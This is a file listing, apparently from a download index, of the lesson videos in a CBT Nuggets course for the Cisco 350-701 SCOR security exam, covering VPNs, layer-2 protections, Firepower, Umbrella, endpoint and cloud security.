CBT Nuggets - Implementing and Operating Cisco Security Core Technologies 350-701 SCOR

mp4   Hot:605   Size:16.81 GB   Created:2021-03-25 11:58:55   Update:2024-03-18 21:19:04  

File List

  • 36 - Planning for and Securing Cloud Infrastructure-as-a-Service/05 - Hardening, Protecting, and Maintaining Cloud VMs.mp4 543.93 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/02 - Know Your Assets.mp4 23.14 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/03 - Know Your Vulnerabilities.mp4 15.99 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/04 - Know Your Threats.mp4 28.43 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/05 - Virus, Trojan, and Malware.. Oh my!.mp4 16.55 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/06 - Phishing and Social Engineering.mp4 17.49 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/07 - DDoS - Attacking Availability.mp4 12.63 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/08 - Spoofing and MitM Attacks.mp4 18.22 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/09 - Summarizing the Threat Landscape.mp4 8.09 MB
    02 - Compare Common Security Vulnerabilities/01 - Introducing Common Attack Vectors.mp4 7.15 MB
    02 - Compare Common Security Vulnerabilities/02 - Get to Know OWASP.mp4 32.82 MB
    02 - Compare Common Security Vulnerabilities/03 - The SQL Injection’; SELECT - FROM table.mp4 24.58 MB
    02 - Compare Common Security Vulnerabilities/04 - Cross-Site Scripting; var doCode{}.mp4 31.44 MB
    02 - Compare Common Security Vulnerabilities/05 - Password Protection.mp4 27.49 MB
    02 - Compare Common Security Vulnerabilities/06 - Plain-Text Protocols.mp4 28.52 MB
    02 - Compare Common Security Vulnerabilities/07 - The Buffer Overflow.mp4 8.84 MB
    02 - Compare Common Security Vulnerabilities/08 - Summarizing Common Vulnerabilities.mp4 5.8 MB
    03 - Components of Cryptography/01 - Introduction to Components of Cryptography.mp4 8.24 MB
    03 - Components of Cryptography/02 - Data Integrity.mp4 32.42 MB
    03 - Components of Cryptography/03 - Data Privacy.mp4 16.76 MB
    03 - Components of Cryptography/04 - SSL and TLS.mp4 31.48 MB
    03 - Components of Cryptography/05 - Public Key Infrastructure (PKI).mp4 17.67 MB
    03 - Components of Cryptography/06 - IPsec.mp4 16.54 MB
    03 - Components of Cryptography/07 - Authentication.mp4 21.57 MB
    03 - Components of Cryptography/08 - Components of Cryptography Summary.mp4 7.8 MB
    04 - IPsec Fundamentals/01 - Introduction to IPsec.mp4 7.08 MB
    04 - IPsec Fundamentals/02 - IPsec Overview.mp4 22.99 MB
    04 - IPsec Fundamentals/03 - IKEv1 and IKEv2.mp4 29.25 MB
    04 - IPsec Fundamentals/04 - Crypto Map IPsec.mp4 21.33 MB
    04 - IPsec Fundamentals/05 - VTI IPsec.mp4 17.56 MB
    04 - IPsec Fundamentals/06 - DMVPNs.mp4 11.61 MB
    04 - IPsec Fundamentals/07 - FlexVPN.mp4 12.76 MB
    04 - IPsec Fundamentals/08 - GET VPN.mp4 13.87 MB
    04 - IPsec Fundamentals/09 - NAT Traversal.mp4 24.14 MB
    04 - IPsec Fundamentals/10 - IPsec Fundamentals Summary.mp4 4.93 MB
    05 - Cisco Router Site-To-Site VPNs/01 - Introducing Site-To-Site VPNs.mp4 4.78 MB
    05 - Cisco Router Site-To-Site VPNs/02 - Planning for IPsec Site-To-Site.mp4 38.7 MB
    05 - Cisco Router Site-To-Site VPNs/03 - Designing a Site-To-Site VPN.mp4 20.49 MB
    05 - Cisco Router Site-To-Site VPNs/04 - Configuring an IKE Phase 1 Policy.mp4 46.03 MB
    05 - Cisco Router Site-To-Site VPNs/05 - Configuring an IKE Phase 2 (IPsec) Policy.mp4 66.2 MB
    05 - Cisco Router Site-To-Site VPNs/06 - Enabling the IPsec Policy.mp4 72.59 MB
    05 - Cisco Router Site-To-Site VPNs/07 - Protocol Analysis IPsec.mp4 30.6 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/01 - Introduction to P2P GRE over IPsec VPNs.mp4 4.55 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/02 - Overview of GRE over IPsec VPNs.mp4 36.7 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/03 - P2P GRE Tunnel Design.mp4 9.37 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/04 - P2P GRE Tunnel Implementation.mp4 33.17 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/05 - P2P GRE Tunnel Verification.mp4 28.11 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/06 - IPsec Tunnel Protection Design.mp4 14.48 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/07 - IPsec Virtual Tunnel Interface Configuration.mp4 65.69 MB
    06 - Cisco Point-To-Point GRE over IPsec VPNs/08 - IPsec Static VTI Verification.mp4 12.44 MB
    07 - Cisco DMVPN/01 - Introduction to DMVPN.mp4 5.44 MB
    07 - Cisco DMVPN/02 - DMVPN Overview.mp4 14.74 MB
    07 - Cisco DMVPN/03 - Planning for the mGRE Tunnel.mp4 12.63 MB
    07 - Cisco DMVPN/04 - mGRE Tunnel Configuration.mp4 12.41 MB
    07 - Cisco DMVPN/05 - NHRP Overview and Design.mp4 20.73 MB
    07 - Cisco DMVPN/06 - Configuring NHRP for DMVPN.mp4 27.35 MB
    07 - Cisco DMVPN/07 - Adding Routing to DMVPN.mp4 31.64 MB
    07 - Cisco DMVPN/08 - Verifying DMVPNs.mp4 33.43 MB
    07 - Cisco DMVPN/09 - Adding IPsec Protection Profiles.mp4 42.37 MB
    07 - Cisco DMVPN/10 - DMVPN Summary.mp4 4.61 MB
    08 - Cisco GET VPN/01 - Introduction to GET VPN.mp4 10.88 MB
    08 - Cisco GET VPN/02 - GET VPN Overview.mp4 23.5 MB
    08 - Cisco GET VPN/03 - GET VPN Key Servers (KS).mp4 27.05 MB
    08 - Cisco GET VPN/04 - GET VPN Members (GM).mp4 35.08 MB
    08 - Cisco GET VPN/05 - GET VPN Design.mp4 29.83 MB
    08 - Cisco GET VPN/06 - Implementing KS Configuration.mp4 48.67 MB
    08 - Cisco GET VPN/07 - Implementing GM Configuration.mp4 30.5 MB
    08 - Cisco GET VPN/08 - GET VPN verification.mp4 42.23 MB
    08 - Cisco GET VPN/09 - GET VPN Summary.mp4 9.18 MB
    09 - Cisco FlexVPN/01 - Introduction to FlexVPN.mp4 5.87 MB
    09 - Cisco FlexVPN/02 - FlexVPN Overview.mp4 20.5 MB
    09 - Cisco FlexVPN/03 - FlexVPN Components.mp4 22.7 MB
    09 - Cisco FlexVPN/04 - IKEv2 Flex VPN Site-To-Site Planning.mp4 15.9 MB
    09 - Cisco FlexVPN/05 - IKEv2 FlexVPN Site-To-Site Configuration.mp4 35.58 MB
    09 - Cisco FlexVPN/06 - IKEv2 FlexVPN Verification.mp4 28.87 MB
    09 - Cisco FlexVPN/07 - Adding Routing to FlexVPN.mp4 22.47 MB
    09 - Cisco FlexVPN/08 - FlexVPN Summary.mp4 8.05 MB
    10 - Cisco Remote Access VPNs/01 - Introduction to RA VPNs.mp4 6.92 MB
    10 - Cisco Remote Access VPNs/02 - RA VPN Overview.mp4 20.55 MB
    10 - Cisco Remote Access VPNs/03 - FlexVPN IPsec RA VPNs.mp4 36.14 MB
    10 - Cisco Remote Access VPNs/04 - FlexVPN RA Design.mp4 13.91 MB
    10 - Cisco Remote Access VPNs/05 - Setting CA Services in IOS.mp4 39.56 MB
    10 - Cisco Remote Access VPNs/06 - Configuring FlexVPN RA.mp4 49.5 MB
    10 - Cisco Remote Access VPNs/07 - AnyConnect Profile Editor.mp4 30.85 MB
    10 - Cisco Remote Access VPNs/08 - Testing and Verifying the RA VPN.mp4 33.77 MB
    10 - Cisco Remote Access VPNs/09 - Flex VPN RA Summary.mp4 5.53 MB
    11 - Debugging for IPsec Tunnels/01 - Introduction to Debugging IPsec.mp4 4.36 MB
    11 - Debugging for IPsec Tunnels/02 - Overview of IPsec Options.mp4 10.15 MB
    11 - Debugging for IPsec Tunnels/03 - Troubleshooting Tips for IPsec.mp4 23.75 MB
    11 - Debugging for IPsec Tunnels/04 - IKEv1, Phase 1, Missing Routes.mp4 61.18 MB
    11 - Debugging for IPsec Tunnels/05 - IKEv1, Phase 1, Bad Config.mp4 57.23 MB
    11 - Debugging for IPsec Tunnels/06 - IKEv1, Phase 2 Bad Config.mp4 49.99 MB
    11 - Debugging for IPsec Tunnels/07 - IKEv2 Troubleshooting.mp4 60.95 MB
    11 - Debugging for IPsec Tunnels/08 - Summary Troubleshooting IPsec.mp4 4.73 MB
    12 - Security Intelligence/01 - Introduction to Security Intelligence.mp4 7 MB
    12 - Security Intelligence/02 - Security Intelligence Overview.mp4 66.95 MB
    12 - Security Intelligence/03 - Cisco Talos Overview.mp4 10.42 MB
    12 - Security Intelligence/04 - Talos Vulnerability Information.mp4 27.62 MB
    12 - Security Intelligence/05 - Talos Reputation Center.mp4 22.41 MB
    12 - Security Intelligence/06 - Security Intelligence Summary.mp4 8.59 MB
    13 - Explain APIs in the SDN Architecture/01 - Introducing APIs and SDN.mp4 11.76 MB
    13 - Explain APIs in the SDN Architecture/02 - What is an API anyway.mp4 34.98 MB
    13 - Explain APIs in the SDN Architecture/03 - The Northbound API.mp4 17.07 MB
    13 - Explain APIs in the SDN Architecture/04 - The Southbound API.mp4 12.11 MB
    13 - Explain APIs in the SDN Architecture/05 - The Eastbound API.mp4 18.99 MB
    13 - Explain APIs in the SDN Architecture/06 - The Westbound API.mp4 14.91 MB
    13 - Explain APIs in the SDN Architecture/07 - Summarizing APIs and SDN.mp4 12.63 MB
    14 - DNA Center Foundations/01 - Introducing DNA Center.mp4 8.09 MB
    14 - DNA Center Foundations/02 - What DNA Center Does.mp4 33.82 MB
    14 - DNA Center Foundations/03 - What an SD-Access Fabric Does.mp4 28.76 MB
    14 - DNA Center Foundations/04 - The Four Workflows of DNA Center.mp4 27.67 MB
    14 - DNA Center Foundations/05 - The DNA Center Platform APIs.mp4 22.5 MB
    14 - DNA Center Foundations/06 - Summarizing DNA Center.mp4 7.41 MB
    15 - Interpret Basic Python Scripts used with Cisco Security/01 - Introducing Basic Python Security Scripts.mp4 14.49 MB
    15 - Interpret Basic Python Scripts used with Cisco Security/02 - Extending Python and Setting Variables.mp4 62.48 MB
    15 - Interpret Basic Python Scripts used with Cisco Security/03 - Getting Authenticated.mp4 61.19 MB
    15 - Interpret Basic Python Scripts used with Cisco Security/04 - Getting Monitored Applications.mp4 45.22 MB
    15 - Interpret Basic Python Scripts used with Cisco Security/05 - Summarizing Interpreting Python Scripts.mp4 17.27 MB
    16 - Troubleshoot NetFlow/01 - Introduction to Troubleshooting NetFlow.mp4 6.03 MB
    16 - Troubleshoot NetFlow/02 - NetFlow Overview.mp4 15.01 MB
    16 - Troubleshoot NetFlow/03 - Flavors of NetFlow.mp4 22.85 MB
    16 - Troubleshoot NetFlow/04 - NetFlow v5.mp4 20.44 MB
    16 - Troubleshoot NetFlow/05 - Flexible NetFlow.mp4 32.08 MB
    16 - Troubleshoot NetFlow/06 - NetFlow Collectors and Analyzers.mp4 17.81 MB
    17 - The Components of Network Security Design/01 - Intro to components of Network Security Design.mp4 9.36 MB
    17 - The Components of Network Security Design/02 - Network Access Control.mp4 43.46 MB
    17 - The Components of Network Security Design/03 - End Point Security.mp4 23.72 MB
    17 - The Components of Network Security Design/04 - Next Generation Firewalls and IPS.mp4 37.76 MB
    17 - The Components of Network Security Design/05 - TrustSec and MACsec.mp4 24.21 MB
    18 - Configure and Verify Cisco Port Security/01 - Introducing Port Security.mp4 13.22 MB
    18 - Configure and Verify Cisco Port Security/02 - Understanding Port Security and Why we Need It.mp4 36.25 MB
    18 - Configure and Verify Cisco Port Security/03 - Port Security Defaults.mp4 23.73 MB
    18 - Configure and Verify Cisco Port Security/04 - Implementing Port Security on Layer 2 Interface.mp4 30.27 MB
    18 - Configure and Verify Cisco Port Security/05 - Customizing Port Security.mp4 51.66 MB
    18 - Configure and Verify Cisco Port Security/06 - Configuring Auto Errdisable Recovery.mp4 52.3 MB
    18 - Configure and Verify Cisco Port Security/07 - Applying Port Security Skills in Production.mp4 28.34 MB
    18 - Configure and Verify Cisco Port Security/08 - Review of Configure and Verify Cisco Port Security.mp4 10.03 MB
    19 - Configure and Verify Cisco DHCP Snooping/01 - Introducing DHCP Snooping.mp4 11.95 MB
    19 - Configure and Verify Cisco DHCP Snooping/02 - Why is DHCP Snooping Needed.mp4 37.23 MB
    19 - Configure and Verify Cisco DHCP Snooping/03 - The Recipe for DHCP Snooping.mp4 30.15 MB
    19 - Configure and Verify Cisco DHCP Snooping/04 - Building and Implementing DHCP Snooping in PT.mp4 65.92 MB
    19 - Configure and Verify Cisco DHCP Snooping/05 - Adding Source Guard to a Switch.mp4 39.89 MB
    19 - Configure and Verify Cisco DHCP Snooping/06 - Applying DHCP Snooping in Production.mp4 71.04 MB
    19 - Configure and Verify Cisco DHCP Snooping/07 - Review of Configure and Verify Cisco DHCP Snooping.mp4 13 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/01 - Introducing Dynamic ARP Inspection (DAI).mp4 8.06 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/02 - Why is DAI Needed.mp4 17.86 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/03 - The Recipe and Commands for DAI.mp4 31.4 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/04 - Implementing DAI.mp4 36.77 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/05 - ARP Access Lists for Non-DHCP Devices.mp4 46.38 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/06 - Additional DAI Options and Features.mp4 45.82 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/07 - Applying DAI to the Production Network.mp4 33.32 MB
    20 - Configure and Verify Cisco Dynamic ARP Inspection/08 - Review of Configure and Verify Cisco Dynamic ARP Inspection.mp4 10.89 MB
    21 - Private VLANS/01 - Introduction to Private VLANs.mp4 10.32 MB
    21 - Private VLANS/02 - PVLANs Overview.mp4 25.6 MB
    21 - Private VLANS/03 - Promiscuous Ports.mp4 28.7 MB
    21 - Private VLANS/04 - PVLAN Design.mp4 13.83 MB
    21 - Private VLANS/05 - Implement PVLANs.mp4 23.02 MB
    21 - Private VLANS/06 - Verify PVLANs.mp4 37.41 MB
    21 - Private VLANS/07 - Trunking and PVLANs.mp4 31.66 MB
    21 - Private VLANS/08 - PVLAN Summary.mp4 7.48 MB
    22 - VRF-lite/01 - Introduction to VRF-lite.mp4 4.52 MB
    22 - VRF-lite/02 - VRF-lite Overview.mp4 43.59 MB
    22 - VRF-lite/03 - VRF-lite Configuration Basics.mp4 24.68 MB
    22 - VRF-lite/04 - VRFs on a Multi-Layer Switch.mp4 10.99 MB
    22 - VRF-lite/05 - VRF-lite Design.mp4 8.74 MB
    22 - VRF-lite/06 - VRF-lite Implementation.mp4 37.67 MB
    22 - VRF-lite/07 - VRF-lite Adding Routing.mp4 46.48 MB
    22 - VRF-lite/08 - VRF-lite Routing Verification.mp4 50.17 MB
    22 - VRF-lite/09 - DHCP VRF Services.mp4 36.68 MB
    22 - VRF-lite/10 - VRF-lite Summary.mp4 5.85 MB
    23 - Network Infrastructure Device Hardening/01 - Introduction to Device Hardening.mp4 4.6 MB
    23 - Network Infrastructure Device Hardening/02 - Device Hardening Overview.mp4 32.6 MB
    23 - Network Infrastructure Device Hardening/03 - Cisco Guide to Harden IOS Devices.mp4 21.3 MB
    23 - Network Infrastructure Device Hardening/04 - Management Plane Hardening.mp4 78.67 MB
    23 - Network Infrastructure Device Hardening/05 - Control Plane Hardening.mp4 30.23 MB
    23 - Network Infrastructure Device Hardening/06 - Data Plane Hardening.mp4 28.33 MB
    23 - Network Infrastructure Device Hardening/07 - Device Hardening Checklist.mp4 16.57 MB
    23 - Network Infrastructure Device Hardening/08 - Hardening Review.mp4 6.34 MB
    24 - Configure Cisco TrustSec/01 - Introduction to TrustSec.mp4 8.99 MB
    24 - Configure Cisco TrustSec/02 - TrustSec Overview.mp4 29.34 MB
    24 - Configure Cisco TrustSec/03 - TrustSec Security Groups.mp4 22.9 MB
    24 - Configure Cisco TrustSec/04 - Security Group ACLs.mp4 18.99 MB
    24 - Configure Cisco TrustSec/05 - TrustSec Policies.mp4 30.51 MB
    24 - Configure Cisco TrustSec/06 - Configure Network Devices for TrustSec.mp4 35.95 MB
    24 - Configure Cisco TrustSec/07 - ISE and NAD TrustSec Integration.mp4 20.19 MB
    24 - Configure Cisco TrustSec/08 - Verify TrustSec.mp4 65.63 MB
    24 - Configure Cisco TrustSec/09 - SGT eXchange Protocol (SXP).mp4 33.49 MB
    25 - Additional Layer 2 Security/01 - Introduction to Additional Layer 2 Security Options.mp4 16.04 MB
    25 - Additional Layer 2 Security/02 - Layer 2 Security Overview.mp4 40.35 MB
    25 - Additional Layer 2 Security/03 - Storm Control.mp4 81.05 MB
    25 - Additional Layer 2 Security/04 - Root Guard.mp4 68.05 MB
    25 - Additional Layer 2 Security/05 - BPDU Guard.mp4 61.81 MB
    25 - Additional Layer 2 Security/06 - Summary of Layer 2 Security.mp4 14.1 MB
    26 - EIGRP Neighbor Relationships and Authentication/01 - Introduction to EIGRP Relationships and Authentication.mp4 5.9 MB
    26 - EIGRP Neighbor Relationships and Authentication/02 - Neighborship Overview.mp4 22.79 MB
    26 - EIGRP Neighbor Relationships and Authentication/03 - Authentication Overview.mp4 60.2 MB
    26 - EIGRP Neighbor Relationships and Authentication/04 - EIGRP Hands on Lab with Authentication.mp4 43.61 MB
    27 - Troubleshoot OSPF Authentication for IPv4/01 - Intro to IPv4 OSPF Authentication and Troubleshooting.mp4 6.09 MB
    27 - Troubleshoot OSPF Authentication for IPv4/02 - Overview of OSPF Authentication.mp4 96.21 MB
    27 - Troubleshoot OSPF Authentication for IPv4/03 - Implement OSPF Authentication.mp4 71.45 MB
    27 - Troubleshoot OSPF Authentication for IPv4/04 - Virtual Links and Authentication.mp4 23.36 MB
    27 - Troubleshoot OSPF Authentication for IPv4/05 - Troubleshooting OSPF Authentication Lab 01.mp4 77.1 MB
    27 - Troubleshoot OSPF Authentication for IPv4/06 - Troubleshooting OSPF Authentication Lab 02.mp4 101.42 MB
    28 - Troubleshoot OSPF Authentication for IPv6/01 - Intro to IPv6 OSPF Authentication and Troubleshooting.mp4 5.02 MB
    28 - Troubleshoot OSPF Authentication for IPv6/02 - IPv6 OSPF Authentication Overview.mp4 82.88 MB
    28 - Troubleshoot OSPF Authentication for IPv6/03 - Implement and Verify Authentication.mp4 45.23 MB
    28 - Troubleshoot OSPF Authentication for IPv6/04 - Troubleshooting OSPF Authentication Lab 01.mp4 67.41 MB
    28 - Troubleshoot OSPF Authentication for IPv6/05 - Troubleshooting OSPF Authentication Lab 02.mp4 53.69 MB
    29 - Firepower Access Control Policies/01 - Access Control Policy Overview.mp4 32.58 MB
    29 - Firepower Access Control Policies/02 - Access Control Policy Rule Actions Concepts.mp4 24.91 MB
    29 - Firepower Access Control Policies/03 - Access Control Policy Rule Actions Demonstration.mp4 25.78 MB
    29 - Firepower Access Control Policies/04 - URL Filtering.mp4 26.33 MB
    29 - Firepower Access Control Policies/05 - Malware and File Inspections.mp4 34.08 MB
    29 - Firepower Access Control Policies/06 - SSL-TLS Decryption.mp4 33.69 MB
    29 - Firepower Access Control Policies/07 - IPS Inspection.mp4 18.3 MB
    30 - Management Options to Improve Security/01 - Introduction to Secure Network Management.mp4 6.52 MB
    30 - Management Options to Improve Security/02 - Overview of Secure Management.mp4 39.44 MB
    30 - Management Options to Improve Security/03 - Syslog Overview.mp4 38.17 MB
    30 - Management Options to Improve Security/04 - NTP with Authentication.mp4 39.33 MB
    30 - Management Options to Improve Security/05 - Change Control.mp4 13.82 MB
    31 - Troubleshoot SNMP/01 - Introduction to Troubleshooting SNMP.mp4 4.74 MB
    31 - Troubleshoot SNMP/02 - SNMP Overview.mp4 37.78 MB
    31 - Troubleshoot SNMP/03 - SNMPv2 Configuration.mp4 48.34 MB
    31 - Troubleshoot SNMP/04 - SNMPv3 Client Configuration.mp4 62.07 MB
    31 - Troubleshoot SNMP/05 - SNMPv3 Server Configuration.mp4 22.79 MB
    31 - Troubleshoot SNMP/06 - Troubleshooting SNMP.mp4 34.15 MB
    32 - Troubleshoot Network Problems using Logging/01 - Introduction to Troubleshooting using Logging.mp4 4.87 MB
    32 - Troubleshoot Network Problems using Logging/02 - Logging Overview.mp4 20.47 MB
    32 - Troubleshoot Network Problems using Logging/03 - Configuring Logging.mp4 63.39 MB
    32 - Troubleshoot Network Problems using Logging/04 - Conditional Debugging.mp4 44 MB
    33 - Cloud Service and Deployment Models/01 - Planning for Cloud Services.mp4 131.27 MB
    33 - Cloud Service and Deployment Models/02 - Plan for Infrastructure As A Service.mp4 106.06 MB
    33 - Cloud Service and Deployment Models/03 - Plan for Platform As A Service.mp4 94.31 MB
    33 - Cloud Service and Deployment Models/04 - Plan for Software As A Service.mp4 80.32 MB
    33 - Cloud Service and Deployment Models/05 - Plan for Cloud Deployment Models.mp4 136.3 MB
    34 - Planning for Software Development Methodologies/01 - Software and App Development Methodologies.mp4 43.74 MB
    34 - Planning for Software Development Methodologies/02 - Plan for Waterfall Method.mp4 84.38 MB
    34 - Planning for Software Development Methodologies/03 - Plan for Lean and Agile Methods.mp4 81.04 MB
    34 - Planning for Software Development Methodologies/04 - Plan for Kanban and Scrum Teams.mp4 52.18 MB
    34 - Planning for Software Development Methodologies/05 - Continuous Integration, Deployment, and Delivery.mp4 65.72 MB
    34 - Planning for Software Development Methodologies/06 - Understand CICD Pipelines in Action.mp4 103.21 MB
    34 - Planning for Software Development Methodologies/07 - Plan for DevOps.mp4 111.09 MB
    34 - Planning for Software Development Methodologies/08 - Plan for DevSecOps.mp4 108.79 MB
    35 - Planning for and Securing Cloud Software-as-a-Service/01 - Planning for Software-as-a-Service Security.mp4 83.83 MB
    35 - Planning for and Securing Cloud Software-as-a-Service/02 - Federating Identities with SAML, OAuth, and OpenID.mp4 265.5 MB
    35 - Planning for and Securing Cloud Software-as-a-Service/03 - Cisco Zero-Trust for the Workforce.mp4 405.78 MB
    35 - Planning for and Securing Cloud Software-as-a-Service/04 - Cisco Cloudlock Access Security Broker.mp4 294.19 MB
    35 - Planning for and Securing Cloud Software-as-a-Service/05 - Securing DNS with Cisco Umbrella and OpenDNS.mp4 415.29 MB
    35 - Planning for and Securing Cloud Software-as-a-Service/06 - Securing Communications with Cisco Email Security.mp4 448.6 MB
    36 - Planning for and Securing Cloud Infrastructure-as-a-Service/01 - Planning for Cloud Infrastructure Security.mp4 69.65 MB
    36 - Planning for and Securing Cloud Infrastructure-as-a-Service/02 - Assessing Cloud Service Providers.mp4 228.09 MB
    36 - Planning for and Securing Cloud Infrastructure-as-a-Service/03 - Isolating and Segmenting Cloud Networks.mp4 332.82 MB
    36 - Planning for and Securing Cloud Infrastructure-as-a-Service/04 - Leveraging Virtual Appliances.mp4 397.41 MB
    01 - Explain Common Threats Against On-premises and Cloud Environments/01 - Introducing the Cybersecurity Landscape.mp4 16.31 MB
    36 - Planning for and Securing Cloud Infrastructure-as-a-Service/06 - Planning for Infrastructure-as-Code.mp4 389.13 MB
    36 - Planning for and Securing Cloud Infrastructure-as-a-Service/07 - Zero Trust Token Auth Demo.mp4 210.06 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/01 - Securing Cloud Platform-as-a-Service.mp4 68.87 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/02 - Plan for Containers.mp4 363.64 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/03 - Secure Container Images and Registries.mp4 431.65 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/04 - Orchestrating Containers.mp4 396.13 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/05 - Open Web Application Security Project Controls.mp4 266.15 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/06 - OWASP Protective Controls Continued.mp4 267.67 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/07 - Cisco Zero-Trust Architecture Overview.mp4 267.32 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/08 - Securing Workloads with Cisco Tetration.mp4 536.24 MB
    37 - Planning for and Securing Cloud Platform-as-a-Service/09 - Visibility with Cisco AppDynamics.mp4 424.65 MB
    38 - Capture and Redirection Methods/01 - Introduction to Capture and Redirection Methods.mp4 6.39 MB
    38 - Capture and Redirection Methods/02 - Capture and Redirection Overview.mp4 12.4 MB
    38 - Capture and Redirection Methods/03 - Policy Based Routing (PBR) Overview.mp4 10.78 MB
    38 - Capture and Redirection Methods/04 - PBR Configuration and Testing.mp4 29.38 MB
    38 - Capture and Redirection Methods/05 - WCCP Overview and Planning.mp4 10.71 MB
    38 - Capture and Redirection Methods/06 - WSA Configuration for WCCP.mp4 20.13 MB
    38 - Capture and Redirection Methods/07 - IOS Configuration for WCCP.mp4 42.23 MB
    38 - Capture and Redirection Methods/08 - Testing WCCP.mp4 16.87 MB
    38 - Capture and Redirection Methods/09 - Traffic Redirection Summary.mp4 8.59 MB
    39 - Cisco Web Security/01 - Introduction to Cisco Web Security.mp4 5.47 MB
    39 - Cisco Web Security/02 - Web Security Appliance Overview.mp4 33.26 MB
    39 - Cisco Web Security/03 - WSA and AD Integration.mp4 18.93 MB
    39 - Cisco Web Security/04 - WSA Identification Profiles.mp4 29.91 MB
    39 - Cisco Web Security/05 - WSA Access Policies.mp4 27.62 MB
    39 - Cisco Web Security/06 - WSA Application Filtering.mp4 29.04 MB
    39 - Cisco Web Security/07 - WSA TLS Decryption Overview.mp4 15.44 MB
    39 - Cisco Web Security/08 - WSA Certificate Management.mp4 33.96 MB
    39 - Cisco Web Security/09 - WSA Decryption Policy.mp4 32.72 MB
    39 - Cisco Web Security/10 - WSA Additional Security Features.mp4 16.78 MB
    40 - Cisco Email Security/01 - Introduction to Cisco Email Security.mp4 3.96 MB
    40 - Cisco Email Security/02 - Cisco Email Security Overview.mp4 25.68 MB
    40 - Cisco Email Security/03 - ESA Inbound Mail Overview.mp4 34.48 MB
    40 - Cisco Email Security/04 - Blocking Incoming Email.mp4 19.93 MB
    40 - Cisco Email Security/05 - ESA Outbound Mail Overview.mp4 32.16 MB
    40 - Cisco Email Security/06 - SPAM Filtering.mp4 17.28 MB
    40 - Cisco Email Security/07 - Email Anti-Virus.mp4 9.08 MB
    40 - Cisco Email Security/08 - DLP.mp4 14.98 MB
    40 - Cisco Email Security/09 - Encryption.mp4 15.99 MB
    41 - Cisco Umbrella/01 - Introduction to Cisco Umbrella.mp4 6.02 MB
    41 - Cisco Umbrella/02 - Cisco Umbrella Overview.mp4 50.48 MB
    41 - Cisco Umbrella/03 - Umbrella Components.mp4 38.5 MB
    41 - Cisco Umbrella/04 - Policy Overview.mp4 75.03 MB
    41 - Cisco Umbrella/05 - Policy Components.mp4 30.57 MB
    41 - Cisco Umbrella/06 - Policy Creation.mp4 25.34 MB
    41 - Cisco Umbrella/07 - Core Identities.mp4 24 MB
    41 - Cisco Umbrella/08 - Umbrella CA Certificates.mp4 23.22 MB
    41 - Cisco Umbrella/09 - Reporting and Investigation.mp4 22.35 MB
    41 - Cisco Umbrella/10 - Umbrella VA.mp4 94.66 MB
    41 - Cisco Umbrella/11 - Umbrella Summary.mp4 6.88 MB
    42 - Understand and Configure AMP for Endpoints/01 - Introducing Endpoint Security.mp4 25.93 MB
    42 - Understand and Configure AMP for Endpoints/02 - The Types of Endpoint Protection.mp4 21.29 MB
    42 - Understand and Configure AMP for Endpoints/03 - Introducing Advanced Malware Protection (AMP) for Endpoints.mp4 32.83 MB
    42 - Understand and Configure AMP for Endpoints/04 - Configuring Simple Outbreak Controls in AMP.mp4 31.08 MB
    42 - Understand and Configure AMP for Endpoints/05 - Explore Other Outbreak Controls.mp4 23.05 MB
    42 - Understand and Configure AMP for Endpoints/06 - Understand Groups and Policies.mp4 22.64 MB
    42 - Understand and Configure AMP for Endpoints/07 - Summarizing Endpoint Security.mp4 6.7 MB
    43 - Explain Various Types of Endpoint Defenses/01 - Introducing Endpoint Defense Mechanisms.mp4 14.94 MB
    43 - Explain Various Types of Endpoint Defenses/02 - Anti-Virus and Anti-Malware.mp4 20.86 MB
    43 - Explain Various Types of Endpoint Defenses/03 - Indicators of Compromise (IoC).mp4 22.43 MB
    43 - Explain Various Types of Endpoint Defenses/04 - Retrospective Analysis.mp4 15.34 MB
    43 - Explain Various Types of Endpoint Defenses/05 - Dynamic File Analysis.mp4 17.02 MB
    43 - Explain Various Types of Endpoint Defenses/06 - Summarizing Endpoint Protection Mechanisms.mp4 9.49 MB
    44 - Endpoint Security/01 - Introduction to Endpoint Security.mp4 15.59 MB
    44 - Endpoint Security/02 - Why Endpoint Protection is Critical.mp4 20.24 MB
    44 - Endpoint Security/03 - The Value of Mobile Device Management.mp4 22.89 MB
    44 - Endpoint Security/04 - Using Multi-Factor Authentication.mp4 48.79 MB
    44 - Endpoint Security/05 - Posture Assessment for Endpoint Security.mp4 26.18 MB
    44 - Endpoint Security/06 - Patching Endpoints.mp4 15.06 MB
    45 - Describe Controls for End Users' Network Access/01 - Introducing Network Access Control for Endpoints.mp4 16.14 MB
    45 - Describe Controls for End Users' Network Access/02 - Endpoint Profiling.mp4 42.47 MB
    45 - Describe Controls for End Users' Network Access/03 - Identity-Based Authentication.mp4 38.41 MB
    45 - Describe Controls for End Users' Network Access/04 - Authenticating with AnyConnect.mp4 44.3 MB
    45 - Describe Controls for End Users' Network Access/05 - Posture Assessment.mp4 27.75 MB
